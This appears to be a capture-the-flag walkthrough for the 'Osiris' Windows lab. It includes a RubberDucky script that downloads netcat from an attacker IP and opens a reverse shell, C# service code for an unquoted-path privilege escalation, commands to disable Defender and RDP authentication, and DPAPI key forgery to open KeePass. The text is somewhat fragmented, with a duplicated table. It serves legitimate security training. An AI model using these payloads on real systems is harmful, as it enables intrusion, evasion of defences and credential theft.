Osiris
Osiris
Story:
As a final blow to Windcorp's security, you intend to hack the laptop of the
CEO, Charlotte Johnson. You heard she has a boatload of Bitcoin, and
those seem mighty tasty to you.
But they have learned from the previous hacks and have introduced strict
security measures.
However, you dropped a wifi RubberDucky on her driveway. Charlotte and
her personal assistant Alcino, just drove up to her house and he picks up
the bait as they enter the building.
Sitting in your black van, just outside her house, you wait for them to plug
in the RubberDucky (curiosity kills cats, remember?) and once you see the
Ducky’s Wifi network pop up, you make a connection to the RubberDucky
and are ready to send her a payload…
This is where your journey begins. Can you come up with a payload and
get that sweet revshell?
And if you do, can you bypass the tightened security? Remember,
antivirus tools aren’t the sharpest tools in the shed, sometimes changing
the code a little bit and recompiling the executable can bypass these
simplest of detections.
As a final hint, remember when have pwned their domain controller? You
might need to revisit Ra to extract a key component to manage this task,
you will need the keys to the kingdom...
Info:
To simulate the payload delivery, we have put up a TFTP-server on the
target computer. Use that, to put your RubberDucky-scripts on the target
computer.
Important:
The TFTP server itself, any software or scripts you find regarding the
RubberDucky is not a part of the challenge.
Recon
Nothing much to do at this part. We cannot Nmap-scan the target,
because we don’t really have access to its network interface. (All ports are
closed to simulate this)
We try some RubberDucky payloads using PowerShell, but nothing really
sticks. They have upped their security, remember? So we start thinking
what they could have done…
Windows Defender is surely active and we have seen they have used
Powershell CLM on Set earlier. So it is safe to assume they use that here
too. There really is no need for full-blown Powershell on the CEO’s laptop.
Also, Applocker is probably in use.
We also keep that in mind.
DELAY 500
GUI r
DELAY 500
STRING powershell -W hidden
ENTER
DELAY 1000
ENTER
STRING Invoke-WebRequest http://192.168.16.65/nc64.exe -outfile c:
\windows\temp\nc64.exe
ENTER
DELAY 1000
STRING c:\windows\temp\nc64.exe 192.168.16.65 4444 -e cmd
ENTER
Sending
We see a user "scheduler" has full access, but we have only read.
C:\script>cacls *
cacls *
C:\script\copyprofile.cmd BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
OSIRIS\scheduler:(ID)F
C:\script\update.vbs BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
OSIRIS\scheduler:(ID)F
dir /s c:\temp
Volume in drive C has no label.
Volume Serial Number is DEA7-4E33
Directory of c:\temp
Directory of c:\temp\OpenVPN
Directory of c:\temp\OpenVPN\x86_64
When checking out c:\program files\IVPN Client, we find a folder with the
same name "OpenVPN" inside. It is also recently changed.
CREATOR OWNER:(OI)(CI)(IO)(ID)F
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION
PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION
PACKAGES:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
GENERIC_READ
GENERIC_EXECUTE
But on the IVPN Service, we find that a user named "scheduler" has
Write access
FILE_GENERIC_EXECUTE
FILE_READ_DATA
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_READ_EA
FILE_WRITE_EA
FILE_EXECUTE
FILE_READ_ATTRIBUTES
FILE_WRITE_ATTRIBUTES
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special
access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
APPLICATION PACKAGE AUTHORITY\ALL
APPLICATION PACKAGES:(ID)R
APPLICATION PACKAGE AUTHORITY\ALL
APPLICATION PACKAGES:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
GENERIC_READ
GENERIC_EXECUTE
An idea of what things might be running and also how it could be exploited
are forming.
It runs without any output, but no error either, and we find our test file:
PSComputerName : OSIRIS
Name : IVPN Client
Status : OK
ExitCode : 0
DesktopInteract : False
ErrorControl : Normal
PathName : C:\Program Files\IVPN Client\IVPN Service.exe
ServiceType : Own Process
StartMode : Auto
__GENUS : 2
__CLASS : Win32_Service
__SUPERCLASS : Win32_BaseService
__DYNASTY : CIM_ManagedSystemElement
__RELPATH : Win32_Service.Name="IVPN Client"
__PROPERTY_COUNT : 26
__DERIVATION : {Win32_BaseService, CIM_Service,
CIM_LogicalElement, CIM_ManagedSystemElement}
__SERVER : OSIRIS
__NAMESPACE : root\cimv2
__PATH : \\OSIRIS\root\cimv2:Win32_Service.Name="IVPN
Client"
AcceptPause : False
AcceptStop : True
Caption : IVPN Client
CheckPoint : 0
CreationClassName : Win32_Service
DelayedAutoStart : False
Description :
DisplayName : IVPN Client
InstallDate :
ProcessId : 1040
ServiceSpecificExitCode : 0
Started : True
StartName : LocalSystem
State : Running
SystemCreationClassName : Win32_ComputerSystem
SystemName : OSIRIS
TagId : 0
WaitHint : 0
Scope : System.Management.ManagementScope
Path : \\OSIRIS\root\cimv2:Win32_Service.Name="IVPN
Client"
Options : System.Management.ObjectGetOptions
ClassPath : \\OSIRIS\root\cimv2:Win32_Service
Properties : {AcceptPause, AcceptStop, Caption,
CheckPoint...}
SystemProperties : {__GENUS, __CLASS, __SUPERCLASS, __DYNASTY...}
Qualifiers : {dynamic, Locale, provider, UUID}
Site :
Container :
We need to make a service exe. A ordinary exe will not do. We can try to
use MSFVenom, but that exe will be caught by Defender, it knows
Metasploit a bit too well…
get-MpPreference
AllowNetworkProtectionOnWinServer : False
AttackSurfaceReductionOnlyExclusions :
AttackSurfaceReductionRules_Actions : {1, 1, 1, 1...}
AttackSurfaceReductionRules_Ids : {01443614-cd74-433a-
b99e-2ecdc07bfc25,
26190899-1602-49e8-8b27-
eb1d0a1ce869,
3B576869-A4EC-4529-8536-
B80A7769E899,
5BEB7EFE-
FD9A-4556-801D-275E5FFC04CC...}
--- snip ---
We can see there are a lot of ASR rules in play here. Actually every rule is
activated.
Rules explained
Rule name GUID File & folder Minimum OS
exclusions supported
Block BE9BA2D9-53E Supported Windows 10,
executable A-4CDC-84E5- version 1709
content from 9B1EEEE46550 (RS3, build
email client and 16299) or
webmail greater
Block all Office D4F940AB-401 Supported Windows 10,
applications B-4EFC-AADC- version 1709
from creating AD5F3C50688A (RS3, build
child processes 16299) or
greater
Block Office 3B576869- Supported Windows 10,
applications A4EC-4529-85 version 1709
from creating 36- (RS3, build
executable B80A7769E899 16299) or
content greater
Block Office 75668C1F-73B5 Supported Windows 10,
applications -4CF0- version 1709
from injecting BB93-3ECF5CB (RS3, build
code into other 7CC84 16299) or
processes greater
Block JavaScript D3E037E1-3EB8 Supported Windows 10,
from creating 36- (RS3, build
executable B80A7769E899 16299) or
content greater
Block Office 75668C1F-73B5 Supported Windows 10,
applications -4CF0- version 1709
from injecting BB93-3ECF5CB (RS3, build
code into other 7CC84 16299) or
processes greater
Block JavaScript D3E037E1-3EB8 Supported Windows 10,
or VBScript from -44C8- version 1709
launching A917-57927947 (RS3, build
downloaded 596D 16299) or
executable greater
content
Block execution 5BEB7EFE- Supported Windows 10,
of potentially FD9A-4556-801 version 1709
obfuscated D-275E5FFC04 (RS3, build
scripts CC 16299) or
greater
Block Win32 API 92E97FA1-2EDF Supported Windows 10,
calls from Office -4476- version 1709
macros BDD6-9DD0B4 (RS3, build
DDDC7B 16299) or
greater
Block 01443614- Supported Windows 10,
executable files cd74-433a- version 1709
from running b99e-2ecdc07b (RS3, build
unless they fc25 16299) or
meet a greater
prevalence, age,
or trusted list
criterion
Use advanced c1db55ab- Supported Windows 10,
protection c21a-4637- version 1709
against bb3f- (RS3, build
ransomware a12568109d35 16299) or
greater
Block credential 9e6c4e1f-7d60- Supported Windows 10,
stealing from 472f-ba1a- version 1709
the Windows a39ef669e4b2 (RS3, build
local security 16299) or
authority greater
subsystem
(lsass.exe)
Block process d1e49aac-8f56- Supported Windows 10,
creations 4280- version 1709
originating from b9ba-993a6d77 (RS3, build
PSExec and 406c 16299) or
WMI commands greater
authority greater
subsystem
(lsass.exe)
Block process d1e49aac-8f56- Supported Windows 10,
creations 4280- version 1709
originating from b9ba-993a6d77 (RS3, build
PSExec and 406c 16299) or
WMI commands greater
Block untrusted b2b3f03d-6a65 Supported Windows 10,
and unsigned -4f7b- version 1709
processes that a9c7-1c7ef74a9 (RS3, build
run from USB ba4 16299) or
greater
Block Office 26190899-1602 Supported Windows 10,
communication -49e8-8b27- version 1709
application from eb1d0a1ce869 (RS3, build
creating child 16299) or
processes greater
Block Adobe 7674ba52-37eb Supported Windows 10,
Reader from -4a4f-a9a1- version 1709
creating child f0f9a1619a2c (RS3, build
processes 16299) or
greater
Block e6db77e5-3df2 Not supported Windows 10,
persistence -4cf1- version 1903
through WMI b95a-6369793 (build 18362) or
event 51e5b greater
subscription
https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d
We try it out on a local windows, but for some reason unknown for us at
the moment, it seems we cannot add a task as "NT System" on a domain
joined computer that is offline from the domain.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset
windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
https://github.com/mattymcfatty/unquotedPoC
We clone the project, and make a service that runs our custom Netcat that
already resides in c:\windows\temp\.
/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
this.eventLogSimple = new System.Diagnostics.EventLog();
((System.ComponentModel.ISupportInitialize)
(this.eventLogSimple)).BeginInit();
//
// SimpleService
//
System.Diagnostics.Process process = new
System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new
System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle =
System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = "c:\\windows\\temp\\nc64.exe
192.168.16.65 4455 -e cmd";
process.StartInfo = startInfo;
process.Start();
this.ServiceName = "Not The Service You Think It Is";
((System.ComponentModel.ISupportInitialize)
(this.eventLogSimple)).EndInit();
To exploit the unquoted service path, our compiled new service needs to
be named ivpn.exe and be placed in: c:\program files\IVPN Client\
And run the vbscript, followed by a check that our binary has arrived
where we planned.
And it has.
We have set up our Netcat to call home on 4455, so we put up a listener
Then the moment of truth. We restart the service, hoping to get a revshell
back on 4455.
And we do
As we now are system. The sky is the limit… But still restricted by that
pesky Defender.
Start the listener again, and wait for our service to call home once again.
It does
We run it through John the ripper, but he doesn't manage to crack it for
us.
So, let's replace it.
● user : WINDCORP\chajoh
● password : NewPassword123#
● ntlm : bce4433c7aafc0dbafcc69883f050a15
reg add
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d
"0" /f
Then give "Everyone" logon rights. Only administrators can by default use
RDS and we cannot add Charlotte to administrators, because she is a
domain-account and we are offline.
But, we can add Everyone…
Deactivate FW
We find the logged on users session ID and log him out. Or else they will
get a prompt, asking to allow or reject our RDP login.
Then login
We regain access to Ra and export DPAPI Domain Backup Key (And make
note to ourself, that we will always export those when pwning a Domain
Controller)
Now is the time to use our new ntlm hash (that we wrote down) to make a
new masterkey for Keepass
We need to do one thing first. CQMasterKeyAD.exe uses "cqure" as
hardcoded passphrase, while Mimikatz uses "mimikatz" when exporting
the pfx.
Extract:
openssl pkcs12 -in DMK.pfx -out temp.pem -nodes
Repack:
openssl pkcs12 -export -out DMK.pfx -in temp.pem
Do not forget to shuffle the old and the new file, and change the attributes
on the new key file:
attrib "c:
\users\chajoh\appdata\roaming\microsoft\protect\S-1-5-21-555431066-35990
73733-176599750-1125\a773eede-71b6-4d66-b4b8-437e01749caa" +S +H
Then, starting Keepass reveals Flag3, the password we are looking for.
Hope you enjoyed pwning Osiris, just as much we did making it! We
learned some interesting things about DPAPI,
we hope you did too!